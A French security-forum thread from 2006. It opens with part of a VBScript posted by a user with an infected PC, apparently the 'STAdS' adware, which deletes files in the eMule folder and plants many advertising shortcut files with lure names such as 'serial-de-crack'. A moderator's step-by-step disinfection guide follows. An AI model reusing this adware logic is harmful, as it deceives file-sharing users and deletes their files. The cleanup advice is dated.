.WriteLine "87,Apprendre le chinois avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "88,Apprendre le chinois avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "101,Apprendre le mandarin avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "102,Apprendre le mandarin avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "103,Apprendre le mandarin avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "104,Apprendre le mandarin avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "105,Apprendre le mandarin avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "106,Apprendre le mandarin avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "107,Apprendre le mandarin avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "108,Apprendre le mandarin avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "91,Apprendre l'allemand avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "92,Apprendre l'allemand avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "93,Apprendre l'allemand avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "94,Apprendre l'allemand avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "95,Apprendre l'allemand avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "96,Apprendre l'allemand avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "97,Apprendre l'allemand avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "98,Apprendre l'allemand avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "31,Apprendre le japonais avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "32,Apprendre le japonais avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "33,Apprendre le japonais avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "34,Apprendre le japonais avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "35,Apprendre le japonais avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "36,Apprendre le japonais avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "37,Apprendre le japonais avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.WriteLine "38,Apprendre le japonais avec des correspondants (vocabulaire-langues-exercices)-STAdS"
.WriteLine "11,Apprendre l'anglais avec des correspondants (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "12,Apprendre l'anglais avec des correspondants (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "13,Apprendre l'anglais avec des correspondants (Assimil-Harrap-Collins)-STAdS"
.WriteLine "14,Apprendre l'anglais avec des correspondants (serial-de-crack)-STAdS"
.WriteLine "15,Apprendre l'anglais avec des correspondants (cours-libre-de)-STAdS"
.WriteLine "16,Apprendre l'anglais avec des correspondants (dico-dictionnaire-Larousse)-STAdS"
.WriteLine "17,Apprendre l'anglais avec des correspondants (traducteur-dico-dictionnaire)-STAdS"
.Write "18,Apprendre l'anglais avec des correspondants (vocabulaire-langues-exercices)-STAdS"
Case "es"
.WriteLine "1,Aprender el frances con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "2,Aprender el frances con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "3,Aprender el frances con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "4,Aprender el frances con hablantes nativos (serial de crack)-STAdS"
.WriteLine "5,Aprender el frances con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "6,Aprender el frances con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "7,Aprender el frances con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "8,Aprender el frances con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "51,Aprender el portugues con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "52,Aprender el portugues con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "53,Aprender el portugues con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "54,Aprender el portugues con hablantes nativos (serial de crack)-STAdS"
.WriteLine "55,Aprender el portugues con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "56,Aprender el portugues con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "57,Aprender el portugues con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "58,Aprender el portugues con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "41,Aprender el italiano con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "42,Aprender el italiano con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "43,Aprender el italiano con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "44,Aprender el italiano con hablantes nativos (serial de crack)-STAdS"
.WriteLine "45,Aprender el italiano con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "46,Aprender el italiano con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "47,Aprender el italiano con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "48,Aprender el italiano con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "61,Aprender el arabe con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "62,Aprender el arabe con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "63,Aprender el arabe con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "64,Aprender el arabe con hablantes nativos (serial de crack)-STAdS"
.WriteLine "65,Aprender el arabe con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "66,Aprender el arabe con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "67,Aprender el arabe con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "68,Aprender el arabe con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "11,Aprender el ingles con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "12,Aprender el ingles con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "13,Aprender el ingles con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "14,Aprender el ingles con hablantes nativos (serial de crack)-STAdS"
.WriteLine "15,Aprender el ingles con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "16,Aprender el ingles con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "17,Aprender el ingles con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "18,Aprender el ingles con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "71,Aprender el ruso con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "72,Aprender el ruso con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "73,Aprender el ruso con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "74,Aprender el ruso con hablantes nativos (serial de crack)-STAdS"
.WriteLine "75,Aprender el ruso con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "76,Aprender el ruso con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "77,Aprender el ruso con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "78,Aprender el ruso con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "81,Aprender el chino con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "82,Aprender el chino con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "83,Aprender el chino con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "84,Aprender el chino con hablantes nativos (serial de crack)-STAdS"
.WriteLine "85,Aprender el chino con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "86,Aprender el chino con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "87,Aprender el chino con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "88,Aprender el chino con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "91,Aprender el aleman con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "92,Aprender el aleman con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "93,Aprender el aleman con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "94,Aprender el aleman con hablantes nativos (serial de crack)-STAdS"
.WriteLine "95,Aprender el aleman con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "96,Aprender el aleman con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "97,Aprender el aleman con hablantes nativos (traductor dico diccionario)-STAdS"
.WriteLine "98,Aprender el aleman con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
.WriteLine "31,Aprender el japones con hablantes nativos (Talk-Learn-Speak-To-Me)-STAdS"
.WriteLine "32,Aprender el japones con hablantes nativos (Talk-Tell-To-Me-More)-STAdS"
.WriteLine "33,Aprender el japones con hablantes nativos (Parle moi Pimsleur)-STAdS"
.WriteLine "34,Aprender el japones con hablantes nativos (serial de crack)-STAdS"
.WriteLine "35,Aprender el japones con hablantes nativos (curso-libro-de)-STAdS"
.WriteLine "36,Aprender el japones con hablantes nativos (dico diccionario Larousse)-STAdS"
.WriteLine "37,Aprender el japones con hablantes nativos (traductor dico diccionario)-STAdS"
.Write "38,Aprender el japones con hablantes nativos (Aprender Idiomas ejercicios)-STAdS"
Case "en"
.WriteLine "41,Learn Italian with native speakers (Babylon-Systran)-STAdS"
.WriteLine "42,Learn Italian with native speakers (Translator-Power)-STAdS"
.WriteLine "43,Learn Italian with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "44,Learn Italian with native speakers (Dictionary-Course)-STAdS"
.WriteLine "45,Learn Italian with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "46,Learn Italian with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "47,Learn Italian with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "31,Learn Japanese with native speakers (Babylon-Systran)-STAdS"
.WriteLine "32,Learn Japanese with native speakers (Translator-Power)-STAdS"
.WriteLine "33,Learn Japanese with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "34,Learn Japanese with native speakers (Dictionary-Course)-STAdS"
.WriteLine "35,Learn Japanese with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "36,Learn Japanese with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "37,Learn Japanese with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "71,Learn Russian with native speakers (Babylon-Systran)-STAdS"
.WriteLine "72,Learn Russian with native speakers (Translator-Power)-STAdS"
.WriteLine "73,Learn Russian with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "74,Learn Russian with native speakers (Dictionary-Course)-STAdS"
.WriteLine "75,Learn Russian with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "76,Learn Russian with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "77,Learn Russian with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "61,Learn Arabic with native speakers (Babylon-Systran)-STAdS"
.WriteLine "62,Learn Arabic with native speakers (Translator-Power)-STAdS"
.WriteLine "63,Learn Arabic with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "64,Learn Arabic with native speakers (Dictionary-Course)-STAdS"
.WriteLine "65,Learn Arabic with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "66,Learn Arabic with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "67,Learn Arabic with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "101,Learn Mandarin with native speakers (Babylon-Systran)-STAdS"
.WriteLine "102,Learn Mandarin with native speakers (Translator-Power)-STAdS"
.WriteLine "103,Learn Mandarin with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "104,Learn Mandarin with native speakers (Dictionary-Course)-STAdS"
.WriteLine "105,Learn Mandarin with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "106,Learn Mandarin with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "107,Learn Mandarin with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "81,Learn Chinese with native speakers (Babylon-Systran)-STAdS"
.WriteLine "82,Learn Chinese with native speakers (Translator-Power)-STAdS"
.WriteLine "83,Learn Chinese with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "84,Learn Chinese with native speakers (Dictionary-Course)-STAdS"
.WriteLine "85,Learn Chinese with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "86,Learn Chinese with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "87,Learn Chinese with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "1,Learn French with native speakers (Babylon-Systran)-STAdS"
.WriteLine "2,Learn French with native speakers (Translator-Power)-STAdS"
.WriteLine "3,Learn French with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "4,Learn French with native speakers (Dictionary-Course)-STAdS"
.WriteLine "5,Learn French with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "6,Learn French with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "7,Learn French with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "21,Learn Spanish with native speakers (Babylon-Systran)-STAdS"
.WriteLine "22,Learn Spanish with native speakers (Translator-Power)-STAdS"
.WriteLine "23,Learn Spanish with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "24,Learn Spanish with native speakers (Dictionary-Course)-STAdS"
.WriteLine "25,Learn Spanish with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "26,Learn Spanish with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "27,Learn Spanish with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "51,Learn Portuguese with native speakers (Babylon-Systran)-STAdS"
.WriteLine "52,Learn Portuguese with native speakers (Translator-Power)-STAdS"
.WriteLine "53,Learn Portuguese with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "54,Learn Portuguese with native speakers (Dictionary-Course)-STAdS"
.WriteLine "55,Learn Portuguese with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "56,Learn Portuguese with native speakers (Thomas-Pimsleur)-STAdS"
.WriteLine "57,Learn Portuguese with native speakers (To-Speak-Learn)-STAdS"
.WriteLine "91,Learn German with native speakers (Babylon-Systran)-STAdS"
.WriteLine "92,Learn German with native speakers (Translator-Power)-STAdS"
.WriteLine "93,Learn German with native speakers (Stone-Rosetta)-STAdS"
.WriteLine "94,Learn German with native speakers (Dictionary-Course)-STAdS"
.WriteLine "95,Learn German with native speakers (Car-Berlitz-Learn)-STAdS"
.WriteLine "96,Learn German with native speakers (Thomas-Pimsleur)-STAdS"
.Write "97,Learn German with native speakers (To-Speak-Learn)-STAdS"
End Select
Case "LinksCreator"
.WriteLine "del """+EmuleFolder+"\*native speakers*"""
.WriteLine "del """+EmuleFolder+"\*hablantes nativos*"""
.WriteLine "del """+EmuleFolder+"\*correspondants (*"""
.WriteLine "del """+EmuleFolder+"\*)-STAdS.url"""
.WriteLine "del """+EmuleFolder+"\*)-STAdS(1).url"""
.WriteLine "del """+EmuleFolder+"\*)-STAdS(2).url"""
.WriteLine ""
.WriteLine "cd %programfiles%\STAdS"
.WriteLine ""
.WriteLine "if ""%1""==""CleanOnly"" goto :EOF"
.WriteLine "for /f ""delims=, Tokens=1,*"" %%i in (StadsLinksDefs.txt) do @call :create "" %%j.url"" %%i"
.WriteLine "goto :EOF"
.WriteLine ""
.WriteLine ":create"
.WriteLine "cd """+EmuleFolder+""""
.WriteLine "echo [InternetShortcut] >%1"
.WriteLine "echo URL=http://www.sharedtalk.com/index.aspx?EID=%2 >>%1"
.WriteLine "echo Modifier=SharedTalk.com is a Language Exchange Community dedicated to Foreign Languages Learn and Practice. >>%1"
.WriteLine "goto :EOF"
Case "Duplicator"
.WriteLine "if Not exist """+EmuleFolder+""" goto :EOF"
.WriteLine "Del """+EmuleFolder+"\* STAdS.rar"""
.WriteLine "Del """+EmuleFolder+"\* STAdS(1).rar"""
.WriteLine "Del """+EmuleFolder+"\* STAdS(2).rar"""
.WriteLine "Del """+EmuleFolder+"\* SharedTalk.rar"""
Case "Uninstall"
.WriteLine "@echo Please Wait... Uninstalling STAdS"
.WriteLine "@WScript ""%programfiles%\STAdS\StadsRunner.vbs"" Uninstall"
End Select
.Close
End With
End Function
yoyo92
 
Messages: 3
Inscription: 11 Juin 2006, 17:01

Messagede nickW » 11 Juin 2006, 23:50

Bonsoir,

Rien de vraiment "méchant", mais un bon nettoyage sera utile dans un premier temps.
Ensuite, tu pourras surement alléger la procédure de démarrage (dans un second temps).
Enfin, les problèmes de lenteur sont peut-être dûs à des conflits entre tes trois anti-spywares: ewidoguard, Microsoft AntiSpyware et Trend Micro Anti-Spyware


Au vu de la longueur de la procédure, je te conseille de l'imprimer, ou d'en sélectionner toutes les lignes et de copier cette sélection dans un fichier texte sur ton PC (Note: tu n'auras pas accès à Internet à partir de l'étape 7).
Il faut exécuter toutes les étapes, sans interruption, dans l'ordre exact indiqué ci-dessous.
Si un élément te paraît obscur, demande des explications avant de commencer la désinfection.


Note: Ces manips doivent être effectuées en ayant ouvert une session avec les droits "Administrateur".

Étape 1: Affichage tous fichiers
Vérifier que ta machine affiche bien tous les fichiers
http://assiste.com.free.fr/p/comment/vo ... caches.php


Étape 2: Réglage antivirus
Régler l'antivirus au maximum (scan de la mémoire, des zones d'amorce, de tous les fichiers, des archives).
http://assiste.com.free.fr/p/comment/an ... aximum.php


Étape 3: Pas de processus de contrôle d'intégrité
Désactiver Microsoft Anti-Spyware.
Ouvrir MS Anti-Spyware et cliquer sur Options--->Settings.
Cliquer sur "Realtime Protection" dans le panneau de gauche.
Décocher les deux lignes:
"Enable the Microsoft Security Agents on startup (recommended)"
"Enable real-time spyware threat protection (recommended)"
Cliquer sur "Save".
Ensuite faire un clic droit sur l'icône Microsoft AntiSpyware dans la "zone de notification" (les petites icônes près de l'horloge) et choisir "Shutdown Microsoft Anti-Spyware"
Il faudra le réactiver après désinfection.


Étape 4: Ccleaner
Télécharger et installer Ccleaner Basic dans un dossier spécifique, par exemple C:\Program Files\ccleaner
http://www.ccleaner.com/downloadbuilds.asp

Lancer le programme.
Si nécessaire, aller dans Options et choisir le langage: Français.
*- Dans l'onglet Nettoyeur-Windows, cocher:
Internet Explorer: Fichiers Internet Temporaires, Cookies
Système: Vider la Poubelle, Fichiers Temporaires, Presse-papiers, Vieilles données du Prefetch
*- Dans l'onglet Options-Avancé, décocher:
Effacer uniquement les fichiers, du dossier Temp de Windows, plus vieux que 48 heures
*- Dans l'onglet Nettoyeur-Applications, cocher:
Internet: Sun Java

Cliquer sur Analyse
Dans l'onglet Options-Cookies, faire passer dans le panneau de droite les cookies que tu veux absolument conserver.
Puis dans l'onglet Nettoyeur, cliquer sur Lancer le nettoyage.


Étape 5: ewido anti-malware
Lancer ewido anti-malware. Cliquer sur mise à jour (après avoir saisi les paramètres du proxy si nécessaire), puis sur Démarrer la mise à jour.
Attendre la fin de cette mise à jour puis fermer le programme.


Étape 6: Restauration système
Désactiver la restauration système.
http://assiste.com.free.fr/p/comment/ac ... ration.php


Étape 7: Mode sans échec
Redémarrer en mode sans échec.
Voir http://assiste.com.free.fr/p/comment/de ... _echec.php
Fermer le plus possible de fenêtres.
Pas de connexion Internet ouverte.


Étape 8: Pas de processus de contrôle d'intégrité
Désactiver ewido anti-malware (s'il est actif)
Démarrer--->Exécuter
Taper taskmgr puis clic sur OK
Cliquer sur l'onglet Processus
Vérifier que la case devant Afficher les processus de tous les utilisateurs est cochée
Clic sur Nom de l'image pour avoir un classement alphabétique
Trouver ewidoguard.exe et cliquer sur Terminer le processus

Désactiver Trend Micro Anti-Spyware (s'il est actif)
Démarrer--->Exécuter
Taper taskmgr puis clic sur OK
Cliquer sur l'onglet Processus
Vérifier que la case devant Afficher les processus de tous les utilisateurs est cochée
Clic sur Nom de l'image pour avoir un classement alphabétique
Trouver Tmas.exe et cliquer sur Terminer le processus
Fermer la fenêtre du Gestionnaire de tâches.


Étape 9: HijackThis
Fermer toutes les fenêtres de programme.
Lancer HijackThis.
Cliquer sur le bouton "Do a system scan only" (ou "Scanner seulement" en vf)
Vérifier que HijackThis fera des sauvegardes: Dans "Config", cocher "Make backups before fixing items" (ou "Proteger les objets avt de fixer" en vf), puis cliquer sur le bouton "Back" (ou "Ret" en vf).
Cocher la case située devant les lignes ci-dessous, puis cliquer sur Fix Checked (ou Fixer objet en vf):
(si des lignes sont absentes, le signaler en réponse, après la fin de l'ensemble des étapes).

O2 - BHO: BrowserHelper Class - {EBCDDA60-2A68-11D3-8A43-0060083CFB9C} - C:\WINDOWS\system32\nzdd.dll
O4 - HKLM\..\Run: [AlcxMonitor] ALCXMNTR.EXE--->Pas vraiment "méchant", mais espiogiciel tout de même, par Realtek
O4 - HKLM\..\Run: [STAdS System] C:\Program Files\STAdS\StadsRunner.vbs


Étape 10: ewido anti-malware
Lancer ewido anti-malware et cliquer sur scanner puis sur Scan complet du système.
Si des fichiers infectés sont trouvés, garder l'option par défaut Supprimer (avec la ligne "Créer des copies de sauvegarde cryptées dans la quarantaine" cochée). Cocher aussi la case située devant "Effectuer cette action avec toutes les infections".
A la fin du scan, Sauver le rapport (Menu Fichier--->Enregistrer sous...).


Étape 11: Nettoyage
Exécuter Ccleaner: dans l'onglet Nettoyeur, cliquer sur le bouton "Lancer le nettoyage".
Exécuter l'antivirus, réglé au maximum (si l'antivirus ne démarre pas en mode sans échec, le signaler en réponse, après la fin de l'ensemble des étapes).
Exécuter Spybot-S&D en supprimant tout ce qu'il indique en rouge.
Exécuter Ccleaner: dans l'onglet Nettoyeur, cliquer sur le bouton "Lancer le nettoyage".


Étape 12: Redémarrage
Redémarrer en mode normal.
Si l'antivirus n'a pas pu être exécuté en mode sans échec, le lancer maintenant (réglé au maximum).
Générer un nouveau log HijackThis.
Envoyer en réponse:
*- ce nouveau log HijackThis
*- le rapport d'ewido

en précisant si le problème est toujours là.
Indiquer aussi les difficultés rencontrées au cours des différentes étapes.


A suivre (car il reste des programmes "superflus au démarrage" à supprimer, et des conseils de sécurité à appliquer),
nickW - Image
30/07/2012: Plus de désinfection de PC jusqu'à nouvel ordre.
Pas de demande d'analyse de log en MP (Message Privé)
Mes configs
Avatar de l’utilisateur
nickW
Modérateur
 
Messages: 21698
Inscription: 20 Mai 2004, 17:41
Localisation: Dordogne/Île de France

Messagede yoyo92 » 14 Juin 2006, 21:44

Merci, pour tous ces conseils.
Je ferai cela ce weekend.
A +
yoyo92
 
Messages: 3
Inscription: 11 Juin 2006, 17:01


Retourner vers Sécurité (Contamination - Décontamination)

Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 28 invités

cron